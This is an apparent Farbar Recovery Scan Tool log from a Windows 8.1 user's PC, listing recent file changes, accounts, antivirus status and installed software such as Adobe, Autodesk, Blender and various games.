2020-10-13 19:47 - 2020-09-24 04:55 - 003551744 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2020-10-13 19:47 - 2020-09-24 04:53 - 001684992 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2020-10-13 19:47 - 2020-09-24 04:52 - 003278848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2020-10-13 19:47 - 2020-09-15 09:06 - 001311776 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-10-13 19:47 - 2020-09-15 08:57 - 000325320 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-10-13 19:47 - 2020-09-15 07:24 - 000245752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-10-13 19:47 - 2020-09-15 06:49 - 000281088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2020-10-13 19:47 - 2020-09-15 06:15 - 001040384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-10-13 19:47 - 2020-09-11 18:31 - 000367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\es.dll
2020-10-13 19:47 - 2020-09-11 11:39 - 000288768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ks.sys
2020-10-13 19:47 - 2020-09-11 10:23 - 000516608 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2020-10-13 19:47 - 2020-09-11 01:49 - 001370680 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2020-10-13 19:47 - 2020-09-10 23:27 - 000564224 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2020-10-13 19:47 - 2020-09-10 22:51 - 000642560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2020-10-13 19:47 - 2020-09-10 22:51 - 000005632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2020-10-13 19:47 - 2020-09-10 22:20 - 001757184 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2020-10-13 19:47 - 2020-09-10 22:14 - 002349056 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2020-10-13 19:47 - 2020-09-10 22:11 - 001088512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2020-10-13 19:47 - 2020-09-10 22:02 - 001495040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2020-10-13 19:47 - 2020-09-10 21:56 - 001551360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2020-10-13 19:47 - 2020-09-10 03:24 - 000353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll
2020-10-13 19:34 - 2020-10-13 19:34 - 000275103 _____ C:\Users\Tomika\Downloads\STV-deti-2xA4_Slovenská-aikido-asociácia.pdf
2020-10-12 20:26 - 2020-10-12 20:26 - 000372610 _____ C:\Users\Tomika\Downloads\Vagnerová, Jana - Pandemie .epub
2020-10-10 11:10 - 2020-10-10 11:10 - 000000000 ____D C:\Users\Tomika\Downloads\menu_simple
2020-10-09 19:49 - 2020-10-09 21:16 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\PrusaSlicer
2020-10-09 19:31 - 2020-10-09 19:31 - 000000991 _____ C:\Users\Public\Desktop\PrusaSlicer.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000991 _____ C:\ProgramData\Desktop\PrusaSlicer.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000986 _____ C:\Users\Public\Desktop\Pronterface.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000986 _____ C:\ProgramData\Desktop\Pronterface.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prusa3D
2020-10-09 19:31 - 2020-10-09 19:31 - 000000000 ____D C:\Program Files\Prusa3D
2020-10-09 19:31 - 2015-09-23 13:12 - 000000625 _____ C:\Users\Tomika\printrunconf.ini
2020-10-09 19:30 - 2020-10-09 19:30 - 380393624 _____ (Prusa Research a.s. ) C:\Users\Tomika\Downloads\prusa3d_win_2_2_9_1.exe
2020-10-09 13:47 - 2020-10-09 13:47 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Mitov
2020-10-09 13:47 - 2020-10-09 13:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visuino
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Users\Tomika\Downloads\Visuino_Component_SDK_7_8_3_69
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Users\Tomika\Downloads\Visuino_7_8_3_69
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Program Files (x86)\Mitov
2020-10-09 11:44 - 2020-10-09 11:44 - 010153506 _____ C:\Users\Tomika\Downloads\tandt4-two-buttons-or-rotary encoder=infinite-functions(menu+oled-display).zip
2020-10-07 22:00 - 2020-10-07 22:02 - 384825382 _____ C:\Users\Tomika\Downloads\Visuino_Component_SDK_7_8_3_69.zip
2020-10-07 22:00 - 2020-10-07 22:00 - 136887134 _____ C:\Users\Tomika\Downloads\Visuino_7_8_3_69.zip
2020-10-03 09:52 - 2020-10-03 09:52 - 000420816 _____ C:\Windows\Minidump\100320-13437-01.dmp
2020-10-02 19:07 - 2020-10-03 01:24 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2020-09-26 21:45 - 2020-09-26 21:45 - 000000000 ____D C:\Users\Tomika\AppData\LocalLow\InxileEntertainment
2020-09-26 20:09 - 2020-09-26 20:09 - 000000535 _____ C:\Users\Public\Desktop\Wasteland 3.lnk
2020-09-26 20:09 - 2020-09-26 20:09 - 000000535 _____ C:\ProgramData\Desktop\Wasteland 3.lnk
2020-09-25 16:20 - 2020-09-25 16:20 - 000000864 _____ C:\Users\Tomika\Desktop\They Are Billions.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-10-24 19:59 - 2016-05-15 19:42 - 000000000 ____D C:\ProgramData\NVIDIA
2020-10-24 19:59 - 2013-08-22 15:25 - 000000187 _____ C:\Windows\win.ini
2020-10-24 19:58 - 2017-09-16 12:00 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\WTablet
2020-10-24 19:58 - 2016-05-02 19:13 - 000000000 __SHD C:\Users\Tomika\IntelGraphicsProfiles
2020-10-24 19:58 - 2013-08-22 16:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-10-24 19:57 - 2016-05-02 19:09 - 000000000 ____D C:\Users\Tomika
2020-10-24 19:57 - 2013-08-22 15:25 - 000262144 ___SH C:\Windows\system32\config\BBI
2020-10-24 19:47 - 2016-05-18 23:05 - 000000000 ____D C:\Users\Tomika\AppData\Local\CrashDumps
2020-10-24 12:40 - 2016-05-02 19:14 - 000003598 _____ C:\Windows\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2643689781-145595849-2857803826-1001
2020-10-24 12:33 - 2017-11-21 00:03 - 000000000 ____D C:\Users\Tomika\AppData\LocalLow\Mozilla
2020-10-24 00:01 - 2017-11-05 15:02 - 000004118 _____ C:\Windows\system32\Tasks\CCleaner Update
2020-10-23 23:58 - 2019-10-04 15:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2020-10-23 23:58 - 2019-10-04 15:37 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2020-10-23 23:50 - 2016-05-02 19:09 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Adobe
2020-10-23 22:50 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\NDF
2020-10-23 18:00 - 2013-09-30 06:20 - 000865068 _____ C:\Windows\system32\PerfStringBackup.INI
2020-10-23 18:00 - 2013-08-22 15:36 - 000000000 ____D C:\Windows\Inf
2020-10-23 17:53 - 2016-05-03 12:54 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-10-23 17:41 - 2020-09-08 21:24 - 000000000 ____D C:\Program Files\Kite
2020-10-23 17:34 - 2020-01-01 16:07 - 000003080 _____ C:\Windows\system32\Tasks\Driver Booster Update
2020-10-23 17:34 - 2020-01-01 16:07 - 000002836 _____ C:\Windows\system32\Tasks\Driver Booster SkipUAC (Tomika)
2020-10-23 15:38 - 2016-08-07 19:44 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon
2020-10-23 11:17 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\discord
2020-10-23 10:02 - 2020-01-15 19:52 - 000000000 ____D C:\Program Files\Blender Foundation
2020-10-23 10:02 - 2019-09-04 21:41 - 000001135 _____ C:\Users\Tomika\Desktop\blender.lnk
2020-10-23 10:02 - 2019-09-04 21:41 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender
2020-10-23 09:56 - 2016-06-10 09:37 - 000000000 ____D C:\Users\Tomika\AppData\Local\Autodesk
2020-10-23 09:49 - 2016-05-04 19:07 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\qBittorrent
2020-10-22 22:46 - 2018-05-09 19:01 - 000000000 ____D C:\Users\Tomika\Downloads\mil
2020-10-22 00:39 - 2016-05-02 19:13 - 000795000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-10-21 20:09 - 2019-05-29 18:57 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-21 20:08 - 2018-12-09 17:49 - 000000948 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-21 19:55 - 2016-05-02 19:23 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-10-21 19:55 - 2016-05-02 19:23 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-10-21 19:55 - 2016-05-02 19:23 - 000002203 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-10-19 20:04 - 2020-03-13 18:40 - 1137619341 _____ C:\Windows\MEMORY.DMP
2020-10-19 20:04 - 2016-05-03 12:49 - 000000000 ____D C:\Windows\Minidump
2020-10-17 15:03 - 2020-03-23 23:02 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Code
2020-10-17 12:48 - 2020-03-23 23:17 - 000000000 ____D C:\Users\Tomika\.pylint.d
2020-10-17 12:03 - 2020-09-08 21:25 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Kite
2020-10-17 11:47 - 2020-03-23 23:01 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code
2020-10-16 19:58 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\AppReadiness
2020-10-16 12:00 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\rescache
2020-10-16 10:01 - 2020-03-04 22:12 - 000000000 ____D C:\Users\Tomika\AppData\Local\Arduino15
2020-10-16 09:28 - 2016-05-02 19:04 - 000103424 ____N C:\Windows\Minidump\101620-10890-01.dmp
2020-10-15 21:58 - 2016-05-02 19:22 - 000003386 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-10-15 21:58 - 2016-05-02 19:22 - 000003258 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-10-13 23:08 - 2013-08-22 17:36 - 000000000 ___RD C:\Windows\ToastData
2020-10-13 20:29 - 2013-08-22 17:20 - 000000000 ____D C:\Windows\CbsTemp
2020-10-13 19:44 - 2019-01-01 12:24 - 000004466 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2020-10-13 19:44 - 2019-01-01 12:24 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-10-13 19:44 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-10-13 19:44 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\Macromed
2020-10-09 19:32 - 2016-05-08 15:48 - 000000000 ____D C:\ProgramData\Package Cache
2020-10-09 00:17 - 2019-10-03 22:39 - 000003450 _____ C:\Windows\system32\Tasks\AdobeGCInvoker-1.0
2020-10-06 22:55 - 2016-05-26 22:56 - 000002296 ____H C:\Users\Tomika\Documents\Default.rdp
2020-10-06 22:54 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\FxsTmp
2020-10-04 19:26 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Atom
2020-10-04 19:26 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\.atom
2020-10-04 16:41 - 2020-03-07 15:26 - 000000000 ____D C:\Users\Tomika\.platformio
2020-10-04 16:30 - 2019-08-11 21:57 - 000002117 _____ C:\Users\Tomika\Desktop\Atom.lnk
2020-10-04 16:30 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GitHub, Inc
2020-10-04 16:30 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Local\atom
2020-10-04 12:49 - 2020-05-05 19:43 - 000002173 _____ C:\Users\Tomika\Desktop\Discord.lnk
2020-10-04 12:49 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2020-10-04 12:49 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Local\Discord
2020-10-03 13:40 - 2016-12-17 10:05 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-10-03 01:24 - 2019-10-12 10:45 - 000001221 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2020-10-02 22:58 - 2013-08-22 17:38 - 000835472 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-10-02 22:58 - 2013-08-22 17:38 - 000179608 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-26 21:46 - 2016-11-19 00:31 - 000000000 ____D C:\Users\Tomika\Documents\My Games
2020-09-26 21:21 - 2017-07-14 22:38 - 000000000 ____D C:\Windows\SysWOW64\directx
2020-09-25 15:51 - 2017-09-17 20:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Backup and Sync from Google
2020-09-25 15:51 - 2016-05-22 22:53 - 000002016 _____ C:\Users\Public\Desktop\Google Slides.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002016 _____ C:\ProgramData\Desktop\Google Slides.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002014 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002014 _____ C:\ProgramData\Desktop\Google Sheets.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002004 _____ C:\Users\Public\Desktop\Google Docs.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002004 _____ C:\ProgramData\Desktop\Google Docs.lnk

==================== Files in the root of some directories ========

2016-05-08 17:11 - 2020-08-20 21:11 - 000000034 _____ () C:\Users\Tomika\AppData\Roaming\AdobeWLCMCache.dat
2016-08-03 17:39 - 2016-08-03 17:39 - 000001598 _____ () C:\Users\Tomika\AppData\Roaming\Pecture
2019-05-26 22:16 - 2019-05-26 22:16 - 000001354 _____ () C:\Users\Tomika\AppData\Roaming\PureRef.ini
2016-07-14 03:15 - 2016-06-25 13:58 - 003760289 _____ (KNIGHT ) C:\Users\Tomika\AppData\Roaming\Setup.exe
2017-03-03 18:32 - 2017-03-03 18:32 - 000000218 _____ () C:\Users\Tomika\AppData\Local\.recently-used.xbel
2019-04-28 23:18 - 2019-04-28 23:18 - 000001456 _____ () C:\Users\Tomika\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-05-01 16:56 - 2017-05-01 16:56 - 000000000 ___SH () C:\Users\Tomika\AppData\Local\LumaEmu
2018-09-30 20:56 - 2018-09-30 20:56 - 000000000 _____ () C:\Users\Tomika\AppData\Local\oobelibMkey.log
2017-03-03 18:45 - 2017-03-03 18:45 - 000000779 _____ () C:\Users\Tomika\AppData\Local\recently-used.xbel
2017-09-29 20:46 - 2017-09-29 20:46 - 027393556 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e1c5~0.tmp
2017-09-29 20:46 - 2017-09-29 20:46 - 000000000 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2ce~0.tmp
2017-09-29 20:46 - 2017-09-29 20:48 - 074558506 _____ () C:\Users\Tomika\AppData\Local\svg~210c~111e2de~0.tmp

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-10-22 20:18
==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-10-2020
Ran by Tomika (24-10-2020 20:00:34)
Running from C:\Users\Tomika\Desktop
Windows 8.1 Pro (Update) (X64) (2016-05-02 17:09:48)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2643689781-145595849-2857803826-500 - Administrator - Disabled)
Guest (S-1-5-21-2643689781-145595849-2857803826-501 - Limited - Disabled)
Tomika (S-1-5-21-2643689781-145595849-2857803826-1001 - Administrator - Enabled) => C:\Users\Tomika

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7 Billion Humans (HKLM-x32\...\2056114425_is1) (Version: 1.0.32472 - GOG.com)
7-Zip 15.14 (x64) (HKLM\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.08 - Adobe Systems)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.0.327 - Adobe Systems Incorporated)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.445 - Adobe)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Illustrator CC 2014 (HKLM-x32\...\{2B4B4082-8043-4646-8334-B0A29E641211}) (Version: 18.1.1 - Adobe Systems Incorporated)
Adobe InDesign CC 2018 (HKLM-x32\...\IDSN_13_0) (Version: 13.0 - Adobe Systems Incorporated)
Adobe InDesign CS6 (HKLM-x32\...\{CFB770D7-8D43-1014-922B-CC2715FADE3F}) (Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_0) (Version: 18.0.0 - Adobe Systems Incorporated)
Anaconda3 2020.02 (Python 3.7.6 64-bit) (HKLM\...\Anaconda3 2020.02 (Python 3.7.6 64-bit)) (Version: 2020.02 - Anaconda, Inc.)
Application Verifier x64 External Package (HKLM\...\{D9908CED-5ABB-FEE9-FC84-743F4D38637C}) (Version: 10.1.16299.15 - Microsoft) Hidden
Arduino (HKLM-x32\...\Arduino) (Version: 1.8.12 - Arduino LLC)
Assassin's Creed II (HKLM-x32\...\Uplay Install 4) (Version: - Ubisoft)
Atom (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\atom) (Version: 1.51.0 - GitHub Inc.)
Autodesk Desktop App (HKLM-x32\...\Autodesk Desktop App) (Version: 6.1.0.137 - Autodesk)
Autodesk Fusion 360 (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.9144 - Autodesk, Inc.)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Netfabb Standard version 2017 (HKLM\...\{7F33137F-253B-418F-8600-0CC68A279528}}_is1) (Version: 2017 - Autodesk netfabb)
Autodesk_Netfabb_Standard_ADLM (HKLM\...\{95E20DC3-CA0C-4040-976B-0B9194396EB0}) (Version: 1.0.0.0 - Autodesk) Hidden
Backup and Sync from Google (HKLM\...\{B109BD68-709A-485B-97E6-651FEB234AC9}) (Version: 3.51.3307.8076 - Google, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Blender (HKLM\...\{A0C803A1-310C-4EFF-B881-CA10CF7CD6A7}) (Version: 2.90.1 - Blender Foundation)
Blender (HKLM\...\{A239FF96-639F-4269-9673-E7ED60D5C74D}) (Version: 2.83.3 - Blender Foundation)
Blender (HKLM\...\{A6B045E1-6F1C-4FCD-936A-EE272B675EC8}) (Version: 2.81.1 - Blender Foundation)
Blender (HKLM\...\{EDFAE2A8-E73B-4CD1-9648-46A7E4434BDA}) (Version: 2.82.1 - Blender Foundation)
Blender (HKLM\...\{F343C69A-4ABA-434C-9C73-12A519D269CD}) (Version: 2.80.0 - Blender Foundation)
Bloody7 (HKLM-x32\...\Bloody3) (Version: 20.02.0002 - Bloody)
Call of Duty 2 version 1.3.0.0 (HKLM-x32\...\Call of Duty 2_is1) (Version: 1.3.0.0 - Mr DJ)
Call of Duty 4 - Modern Warfare (HKLM-x32\...\Call of Duty 4 - Modern Warfare_is1) (Version: - )
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.00.0000 - Activision) Hidden
Call of Duty(R) 4 - Modern Warfare(TM) (HKLM-x32\...\InstallShield_{E48469CC-635E-4FD5-A122-1497C286D217}) (Version: 1.7 - Activision)
Call of Duty: Modern Warfare 2 (HKLM-x32\...\Call of Duty: Modern Warfare 2_is1) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.71 - Piriform)
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version: - Progdigy Software S.A.R.L.)
DaVinci Resolve (HKLM\...\{395391BE-FF9A-4A2A-BA89-0EAE0DB0F37B}) (Version: 15.3.0008 - Blackmagic Design)
DaVinci Resolve Panels (HKLM\...\{B1782967-E600-4BBD-B2F1-AEF3F2FE0A12}) (Version: 1.2.1.0 - Blackmagic Design)
Desperados 3 (HKLM-x32\...\Desperados 3_is1) (Version: - )
Discord (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Discord) (Version: 0.0.308 - Discord Inc.)
Driver Booster 7 (HKLM-x32\...\Driver Booster_is1) (Version: 7.2.0 - IObit)
Epic Games Launcher (HKLM-x32\...\{C69A2919-0662-4390-9418-67C931B44C18}) (Version: 1.1.236.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Git version 2.28.0 (HKLM\...\Git_is1) (Version: 2.28.0 - The Git Development Community)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version: - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 86.0.4240.111 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
Grammarly for Microsoft® Office Suite (HKLM\...\{4A6C3487-B58C-4A7D-B224-499CA5F99A7B}) (Version: 6.7.217 - Grammarly) Hidden
Grammarly for Microsoft® Office Suite (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{b7cd3fad-1dd9-41df-9c0c-688b0f8cd287}) (Version: 6.7.217 - Grammarly)
Guild Wars 2 (HKLM\...\Guild Wars 2) (Version: - NCsoft Corporation, Ltd.)
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Human Resource Machine (HKLM-x32\...\1444812654_is1) (Version: 1.0.31924 - GOG.com)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.5074 - Intel Corporation)
Java 10.0.1 (64-bit) (HKLM\...\{D33DF729-38BB-5651-9D40-93BFEFB5DCED}) (Version: 10.0.1.0 - Oracle Corporation)
Kite (HKLM\...\Kite) (Version: - Manhattan Engineering Inc)
Kits Configuration Installer (HKLM-x32\...\{86E59C8F-61D5-1782-A3CE-60AE7E4D7791}) (Version: 10.1.16299.15 - Microsoft) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Lindo 2.4.0 (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\fcf71806-bbf8-5201-910f-7499961bc8e8) (Version: 2.4.0 - Prixe)
LLVM (HKLM-x32\...\LLVM) (Version: 3.9.1 - LLVM)
Media Player Codec Pack 4.4.8 (HKLM-x32\...\Media Player - Codec Pack) (Version: 4.4.8 - Media Player Codec Pack)
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Mendeley Desktop 1.17.6 (HKLM-x32\...\Mendeley Desktop) (Version: 1.17.6 - Mendeley Ltd.)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 83.0.478.50 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.129.37 - )
Microsoft Mathematics Add-in (64-bit) (HKLM\...\{E2C98732-F973-4985-A9C5-DC06178E16EE}) (Version: 2.0.040811.01 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{49e969a1-2990-464d-92b5-25f6f34573c6}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{d2c8df0e-f15d-4426-9e51-f13f329f9cb4}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.50.1 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1089.1204 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 3.1.3 (x64) (HKLM-x32\...\{f7152f3d-2c9d-4752-8a92-045a03b85f42}) (Version: 3.1.3.28628 - Microsoft Corporation)
Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
